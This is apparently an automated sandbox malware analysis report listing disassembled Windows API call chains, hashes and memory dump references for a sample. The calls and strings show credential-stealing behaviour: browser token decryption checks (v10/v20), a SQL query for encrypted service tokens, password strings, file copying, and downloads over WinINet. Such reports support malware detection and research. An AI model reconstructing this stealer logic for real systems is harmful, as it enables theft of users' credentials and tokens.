                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                              • String ID: Password
                              • API String ID: 2698061284-3434357891
                              • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                              • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                              • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                              • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                              APIs
                              • lstrcatA.KERNEL32(?,00740558,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                              • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                              • lstrcatA.KERNEL32(?,?), ref: 00414820
                              • lstrcatA.KERNEL32(?,?), ref: 00414834
                              • lstrcatA.KERNEL32(?,0070A768), ref: 00414847
                              • lstrcatA.KERNEL32(?,?), ref: 0041485B
                              • lstrcatA.KERNEL32(?,007401A8), ref: 0041486F
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID: 0aA
                              • API String ID: 167551676-2786531170
                              • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                              • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                              • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                              • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0073F5C0,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0073F5C0,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                              • __aulldiv.LIBCMT ref: 00418172
                              • __aulldiv.LIBCMT ref: 00418180
                              • wsprintfA.USER32 ref: 004181AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2886426298-3474575989
                              • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                              • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                              • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                              • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                              APIs
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                              • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022E6376
                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E63AE
                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022E63F6
                              • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022E641A
                              • InternetReadFile.WININET(?,?,00000400,?), ref: 022E6443
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022E6471
                              • CloseHandle.KERNEL32(?,?,00000400), ref: 022E64B0
                              • InternetCloseHandle.WININET(?), ref: 022E64BA
                              • InternetCloseHandle.WININET(00000000), ref: 022E64C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                              • String ID:
                              • API String ID: 4287319946-0
                              • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                              • Instruction ID: 7c7fe568c3c3bb04c8668f924665e5d52cd48b0fdf4e0d91caa5e9dd75cfee37
                              • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                              • Instruction Fuzzy Hash: 005160B5960318ABDF20DFD0CC54BEE7779AF04705F4080A8B606A7184DBB46A89CF95
                              APIs
                              • memset.MSVCRT ref: 022F4FEE
                                • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                              • lstrcat.KERNEL32(?,00000000), ref: 022F5017
                              • lstrcat.KERNEL32(?,00421000), ref: 022F5034
                                • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                              • memset.MSVCRT ref: 022F507A
                              • lstrcat.KERNEL32(?,00000000), ref: 022F50A3
                              • lstrcat.KERNEL32(?,00421020), ref: 022F50C0
                                • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                              • memset.MSVCRT ref: 022F5106
                              • lstrcat.KERNEL32(?,00000000), ref: 022F512F
                              • lstrcat.KERNEL32(?,00421038), ref: 022F514C
                                • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C17
                                • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022F4C2C
                                • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C49
                                • Part of subcall function 022F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022F4C85
                                • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,0064A524), ref: 022F4CB1
                                • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022F4CC3
                                • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CD7
                                • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022F4CE9
                                • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CFD
                                • Part of subcall function 022F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022F4D13
                                • Part of subcall function 022F4B77: DeleteFileA.KERNEL32(?), ref: 022F4D98
                              • memset.MSVCRT ref: 022F5192
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID:
                              • API String ID: 4017274736-0
                              • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                              • Instruction ID: 50a4548b2ab4c15d9b3e8341d4de7ecc42de74cd4848995be7608fbb4be062fc
                              • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                              • Instruction Fuzzy Hash: BD41D679A5031867CB50F7F0EC46FDD7739AB24701F8044A4B689660C4EEB857D88F92
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022F8397
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022F839E
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022F83BF
                              • __aulldiv.LIBCMT ref: 022F83D9
                              • __aulldiv.LIBCMT ref: 022F83E7
                              • wsprintfA.USER32 ref: 022F8413
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: @
                              • API String ID: 2774356765-2766056989
                              • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                              • Instruction ID: 2d68da53c4ba1d969d834fcd5b3df6404f30349dff1adc3d4272adc9a355352d
                              • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                              • Instruction Fuzzy Hash: AC2138B1E54218ABDB00DFD5DC49FAEFBB9FB44B04F104619F605BB284C7B869008BA5
                              APIs
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                              • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                              • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                              • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                              • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                              • API String ID: 1440504306-1079375795
                              • Opcode ID: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                              • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                              • Opcode Fuzzy Hash: 182d67c0191f180266542c51a553aab92d802969267d2949ed4017f0d963be07
                              • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess$DefaultLangUser
                              • String ID: B
                              • API String ID: 1494266314-2248957098
                              • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                              • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                              • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                              • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                              • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                              • memset.MSVCRT ref: 00409EE8
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                              • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                              • API String ID: 1977917189-1096346117
                              • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                              • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                              • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                              • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                              APIs
                                • Part of subcall function 022E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                • Part of subcall function 022E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                • Part of subcall function 022E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                • Part of subcall function 022E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                • Part of subcall function 022E7537: HeapFree.KERNEL32(00000000), ref: 022E76C0
                              • lstrcat.KERNEL32(0064A668,004217FC), ref: 022E786D
                              • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78AF
                              • lstrcat.KERNEL32(0064A668,00421800), ref: 022E78C1
                              • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78F6
                              • lstrcat.KERNEL32(0064A668,00421804), ref: 022E7907
                              • lstrcat.KERNEL32(0064A668,00000000), ref: 022E793A
                              • lstrcat.KERNEL32(0064A668,00421808), ref: 022E7954
                              • task.LIBCPMTD ref: 022E7962
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                              • String ID:
                              • API String ID: 2677904052-0
                              • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                              • Instruction ID: 2939e9c7883b69d7bc3ff7d2ae94d0cc368a1a2341d43c68e786eb586915e3cc
                              • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                              • Instruction Fuzzy Hash: A1314F75A50209EFDF04EBE0DC94DFEB776EB59301F505018E106672A4DA34A942DF62
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                              • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                              • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                              • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                              • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                              • InternetCloseHandle.WININET(?), ref: 004050C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2254743598.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2254743598.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2254743598.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 3894370878-0
                              • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                              • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                              • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                              • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022E5231
                              • RtlAllocateHeap.NTDLL(00000000), ref: 022E5238
                              • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022E5251
                              • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022E5278
                              • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022E52A8
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 022E52F1
                              • InternetCloseHandle.WININET(?), ref: 022E5320
                              • InternetCloseHandle.WININET(?), ref: 022E532D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                              • Instruction ID: a8c2018a1be64044be499e83949fdde298d2854408df4f827856bee4c968367c
                              • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                              • Instruction Fuzzy Hash: 6B3118B8A50218ABDB20CF94DC84BDCB7B5EB48704F5081D9F709A7284D7B46AC5CF98
                              APIs
                              • memset.MSVCRT ref: 022E158E
                                • Part of subcall function 022E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                • Part of subcall function 022E1507: RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                • Part of subcall function 022E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                • Part of subcall function 022E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                • Part of subcall function 022E1507: RegCloseKey.ADVAPI32(?), ref: 022E1566
                              • lstrcat.KERNEL32(?,00000000), ref: 022E15B6
                              • lstrlen.KERNEL32(?), ref: 022E15C3
                              • lstrcat.KERNEL32(?,004262EC), ref: 022E15DE
                                • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022F8DED
                                • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022E16CC
                                • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                              • DeleteFileA.KERNEL32(00000000), ref: 022E1756
                              • memset.MSVCRT ref: 022E177D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID:
                              • API String ID: 3885987321-0
                              • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                              • Instruction ID: ec0ae5f51aa62174a407ebcbfa03b32d5cac057fa9c474fdf387058e8e41fc6b
                              • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                              • Instruction Fuzzy Hash: CB514DB19603189BCB59FBA0DD91EEDB37AAF54700F4041B8A70E62184EE345B89CF95
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 022F6BD3
                              • sscanf.NTDLL ref: 022F6C00
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C19
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 022F6C27
                              • ExitProcess.KERNEL32 ref: 022F6C41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2255305705.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_22e0000_OW2Pw3W81N.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID: Xq
                              • API String ID: 2533653975-256023037
                              • Opcode ID: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                              • Instruction ID: be7223b989078f18044266b5138ef5a6c30e201ba90e43929f2d1fe9ff28c260
                              • Opcode Fuzzy Hash: aadf5676f7027d7b9e1150d64898f7b292d6df214c2b0f712edb9653bf63e1a7
                              • Instruction Fuzzy Hash: 8921EBB5D14209AFCF48EFE4D9459EEB7BAFF48300F04852EE516A3254EB345604CB65
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                              • wsprintfA.USER32 ref: 00418459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
